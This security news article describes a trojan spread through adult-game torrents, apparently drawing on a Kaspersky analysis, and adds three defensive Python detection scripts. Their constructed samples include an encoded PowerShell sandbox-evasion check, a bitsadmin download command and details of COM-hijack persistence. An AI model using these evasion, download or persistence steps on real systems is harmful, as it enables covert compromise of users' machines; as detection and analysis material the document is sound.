Distribution of victims | Image: Kaspersky Labs
A dangerous new malware threat is targeting people who download adult video games. Security researchers recently uncovered a sophisticated distribution network built to give the attackers complete control of infected systems; analysts have named the malicious family the Argamal Trojan campaign. According to the technical bulletin, the malware spreads through infected game archives posted on torrent sites, so unsuspecting players face full system compromise and broad remote manipulation. Users should therefore treat unverified software packages with extreme caution.
How Attackers Distribute the Malicious Archives
The threat actors share their malicious files through popular torrent trackers and catalog websites; investigators found trojanized packages listed on specialized platforms such as AniRena, with download links that often redirect to free file transfer services. The downloaded archives contain a fully functional, legitimate copy of the game alongside the hidden threat, so the game launches normally and victims have no reason to suspect their computers are in danger. This blending of real and malicious content helps the malware evade initial human suspicion.
Technical Breakdown of the Infiltration Path
Exploiting the Core Media Library
To execute code silently, the attackers patch a standard media-processing library: the game directory ships a modified copy of ffmpeg.dll, which the game loads at startup. The tampered library then quietly extracts an external data file named natives2_blob.bin. As the official Kaspersky malware analysis notes:
“Since the game needs ffmpeg.dll to run properly, the library loads as soon as the user starts the game.”
The compromised library then hands off to an obfuscated command execution layer.
Initial Environment and Sandbox Evasion
The first execution stage uses a customized data wrapper to evaluate the system: it runs a Base64-encoded PowerShell script that performs strict environment checks for malware analysis tooling, such as searching the local file system for Sandboxie application folders and looking for active process-monitoring tools like Procmon64. If no analysis environment is detected, the script proceeds to establish long-term system access.
Downloading the Final Core Payload
Next, the malware writes a secondary payload downloader script into the user's directories. That script connects to GitHub through the legitimate Windows utility bitsadmin.exe and downloads an encrypted binary asset containing the final Trojan payload, which it then decrypts using advanced cryptographic standards. The core Trojan is then ready to execute and to embed itself deeply in native system behaviour without displaying obvious warning signs.
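The two stages just described leave process-creation telemetry that a defender can triage: an encoded PowerShell command whose decoded body probes for Sandboxie or Procmon64, followed by bitsadmin.exe fetching an asset from github.com. The following is an added example, not code from the Kaspersky report or from the malware. It works over constructed process events (the parent/child/command-line triples and the stage-one script text are all made up for illustration) and decodes the -EncodedCommand argument the way PowerShell does, as Base64 over UTF-16LE.

```python
import base64
import re

# --- Constructed sample data (not from the Kaspersky report) -----------------

def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Hypothetical environment check resembling the behaviour described in the article.
STAGE1_SCRIPT = (
    'if (Test-Path "$env:ProgramFiles\\Sandboxie") { exit }; '
    'if (Get-Process -Name Procmon64 -ErrorAction SilentlyContinue) { exit }; '
    'Start-Sleep 5'
)

# Each event: (parent image, child image, command line). Constructed, not real telemetry.
SAMPLE_EVENTS = [
    ("game.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -EncodedCommand " + encode_powershell(STAGE1_SCRIPT)),
    ("explorer.exe", "powershell.exe", "powershell.exe -Command Get-Date"),
    ("powershell.exe", "bitsadmin.exe",
     "bitsadmin.exe /transfer upd /download /priority high "
     "https://github.com/example-org/example-repo/releases/download/v1/asset.bin "
     "C:\\Users\\user\\AppData\\Local\\asset.bin"),
    ("cmd.exe", "bitsadmin.exe", "bitsadmin.exe /list /allusers"),
]

# --- Detection logic ---------------------------------------------------------

SANDBOX_INDICATORS = ("sandboxie", "procmon64")
# Longest alias first so "-e" does not swallow "-EncodedCommand".
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(parent: str, image: str, cmdline: str):
    """Return human-readable reasons this event deserves attention (empty list if none)."""
    reasons = []
    lowered = cmdline.lower()
    if image.lower() == "powershell.exe":
        script = decode_encoded_command(cmdline)
        if script is not None:
            reasons.append(f"encoded PowerShell launched by {parent}")
            hits = [s for s in SANDBOX_INDICATORS if s in script.lower()]
            if hits:
                reasons.append("decoded script probes for analysis tools: " + ", ".join(hits))
    if image.lower() == "bitsadmin.exe" and "/transfer" in lowered and "github.com" in lowered:
        reasons.append(f"bitsadmin download from GitHub launched by {parent}")
    return reasons


def triage(events):
    """Map event index -> reasons, for every event that matched at least one rule."""
    return {i: r for i, (p, im, c) in enumerate(events) if (r := triage_event(p, im, c))}


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

Decoding the command line rather than matching on the raw Base64 is the point: the same environment checks can be re-encoded into a different blob at will, but the strings the script looks for on disk and in the process list have to survive decoding. The bitsadmin rule is deliberately narrow (a /transfer from github.com); in practice it would be tuned to what normal hosts in the environment do.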
Establishing Persistence via COM Hijacking
To guarantee long-term execution, the Argamal Trojan campaign relies on registry manipulation that targets an automated system maintenance task. The analysis notes that the decrypted core payload is wired into the system configuration:
“The decrypted payload is set as InprocServer32 at HKCU\SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}, which is a COM object used by the \Microsoft\Windows\WindowsColorSystem\Calibration Loader scheduled task.”
Because that scheduled task runs in every user session, the system loader executes the Trojan each time, and the threat actors keep remote access without needing any custom startup files.
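A per-user CLSID registration is the artifact this persistence leaves behind, and it can be audited from a registry export. The following is an added example and not code from the Kaspersky report: it parses a constructed .reg export of HKCU\SOFTWARE\Classes\CLSID (the paths and the second GUID are invented; the first GUID is the one quoted above) and flags InprocServer32 entries that either match the CLSID named in the analysis or point into a user-writable directory, which is the pattern a hijacked COM object typically shows.

```python
import re

# Constructed .reg export, not a dump of a real system. The first CLSID is the one
# quoted in the article; the second is an invented, benign-looking per-user component.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{B210D694-C8DF-490D-9576-9E20CDBC20BD}\InprocServer32]
@="C:\\Users\\user\\AppData\\Roaming\\Media\\core.dll"
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}]
@="Example per-user component"

[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Program Files\\ExampleVendor\\helper.dll"
"ThreadingModel"="Apartment"
'''

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^(@|"([^"]+)")="(.*)"$')
CLSID_KEY = re.compile(r"\\CLSID\\(\{[0-9A-Fa-f-]{36}\})\\InprocServer32$", re.IGNORECASE)

# Directories an unprivileged user can write to; a COM server living here is a red flag.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")
# CLSID named in the article, keyed to the scheduled task that loads it.
WATCHED_CLSIDS = {
    "{B210D694-C8DF-490D-9576-9E20CDBC20BD}": "WindowsColorSystem Calibration Loader task",
}


def parse_reg(text: str):
    """Return {key_path: {value_name: data}} for the string values in a .reg export."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if m := KEY_LINE.match(line):
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        if current and (m := VALUE_LINE.match(line)):
            name = "(Default)" if m.group(1) == "@" else m.group(2)
            # .reg files escape backslashes as "\\"; undo that for path checks.
            keys[current][name] = m.group(3).replace("\\\\", "\\")
    return keys


def find_com_hijacks(reg_text: str):
    """Flag HKCU InprocServer32 entries that match a watched CLSID or a user-writable path."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        if not key.upper().startswith("HKEY_CURRENT_USER\\"):
            continue
        m = CLSID_KEY.search(key)
        if not m:
            continue
        clsid = m.group(1).upper()
        path = values.get("(Default)", "")
        reasons = []
        if clsid in WATCHED_CLSIDS:
            reasons.append("CLSID abused in the campaign: " + WATCHED_CLSIDS[clsid])
        if any(d in path.lower() for d in USER_WRITABLE):
            reasons.append("InprocServer32 points into a user-writable directory")
        if reasons:
            findings.append({"clsid": clsid, "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_com_hijacks(SAMPLE_REG_EXPORT):
        print(f["clsid"], f["path"], "->", "; ".join(f["reasons"]))
```

The user-writable heuristic will also surface legitimate per-user installs that register COM servers under AppData, so the output is a review list, not a verdict. A fuller check compares each HKCU entry with the HKLM registration of the same CLSID, since the per-user key shadows the machine-wide one when the task resolves the object.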
Command and Control Infrastructure Capabilities
Once the infection is complete, the payload sends routine network packets to a remote server: UDP heartbeats to port 57441 of the command host. These packets carry local information about installed security solutions, machine architecture and active usernames. Based on the server's responses, the operators can issue a wide array of control commands; for instance, the server can trigger file deletions, capture screenshots and compress local folders into archives, giving the attackers total control over the infected machine.
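Heartbeats are detectable precisely because they are routine: the same source talks to the same destination port on a regular schedule. The block below is an added example, not code from the Kaspersky report. It runs over constructed flow records (the addresses are from the RFC 5737 documentation ranges and the timings are invented) and flags UDP conversations that either use the reported port 57441 or show a low-variance inter-arrival time, which is what a beacon with modest jitter looks like; the thresholds are assumptions to tune.

```python
from collections import defaultdict
from statistics import mean, pstdev

BEACON_PORT = 57441   # UDP heartbeat port cited in the article
MIN_EVENTS = 5        # fewer flows than this is not enough to judge regularity (assumed)
MAX_CV = 0.2          # max coefficient of variation of inter-arrival times (assumed)

# Constructed flow records (timestamp in seconds, src, dst, proto, dport); not real telemetry.
# Group 1: a heartbeat roughly every 60 s with a little jitter.
# Group 2: four DNS lookups, too few to judge.
# Group 3: six irregular flows, the shape of ordinary interactive traffic.
SAMPLE_FLOWS = (
    [(t, "10.0.0.5", "203.0.113.10", "udp", BEACON_PORT)
     for t in (0, 61, 119, 180, 242, 299, 360, 421, 479, 540)]
    + [(t, "10.0.0.5", "10.0.0.53", "udp", 53) for t in (7, 131, 140, 333)]
    + [(t, "10.0.0.8", "198.51.100.7", "udp", 443) for t in (12, 15, 80, 81, 400, 405)]
)


def beacon_candidates(flows):
    """Return UDP (src, dst, dport) conversations that look like C2 heartbeats, with reasons."""
    groups = defaultdict(list)
    for ts, src, dst, proto, dport in flows:
        if proto == "udp":
            groups[(src, dst, dport)].append(ts)

    results = []
    for (src, dst, dport), times in groups.items():
        times.sort()
        reasons = []
        if dport == BEACON_PORT:
            reasons.append(f"destination port {BEACON_PORT} matches the reported heartbeat port")
        if len(times) >= MIN_EVENTS:
            gaps = [b - a for a, b in zip(times, times[1:])]
            avg = mean(gaps)
            # Population stdev over the gaps, normalised by the mean gap.
            cv = pstdev(gaps) / avg if avg > 0 else float("inf")
            if cv <= MAX_CV:
                reasons.append(f"{len(times)} flows at a regular {avg:.0f}s interval (cv={cv:.2f})")
        if reasons:
            results.append({"src": src, "dst": dst, "dport": dport, "reasons": reasons})
    return results


if __name__ == "__main__":
    for r in beacon_candidates(SAMPLE_FLOWS):
        print(f"{r['src']} -> {r['dst']}:{r['dport']}/udp: " + "; ".join(r["reasons"]))
```

The port match is the cheap, brittle rule: operators can move ports at will. The regularity test is the durable one, and it is also where false positives live (NTP, monitoring agents and similar schedulers beacon too), so a real deployment pairs it with an allowlist of known periodic services.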
Global Impact and Attribution Clues
Tracking the Infected Victims
Telemetry data shows that hundreds of unique individuals have already fallen victim to this operation, most of them in Russia, Brazil, Germany and Vietnam. Notably, the malware deliberately avoids executing on devices configured with a Chinese user locale: if the script detects a Chinese language setting, it replaces its remote address with a local loopback IP.
Spanish Language Identifiers in Code
Investigators also found prominent language clues in the source code framework: the threat actors routinely use Spanish words for internal variables and script comments, such as palabra and ajustarAltura. On this evidence, the Kaspersky malware analysis assesses with medium confidence that the developer speaks Spanish. Ultimately, the operation shows that threat groups are actively capitalizing on specialized gaming communities to deploy stealthy payloads.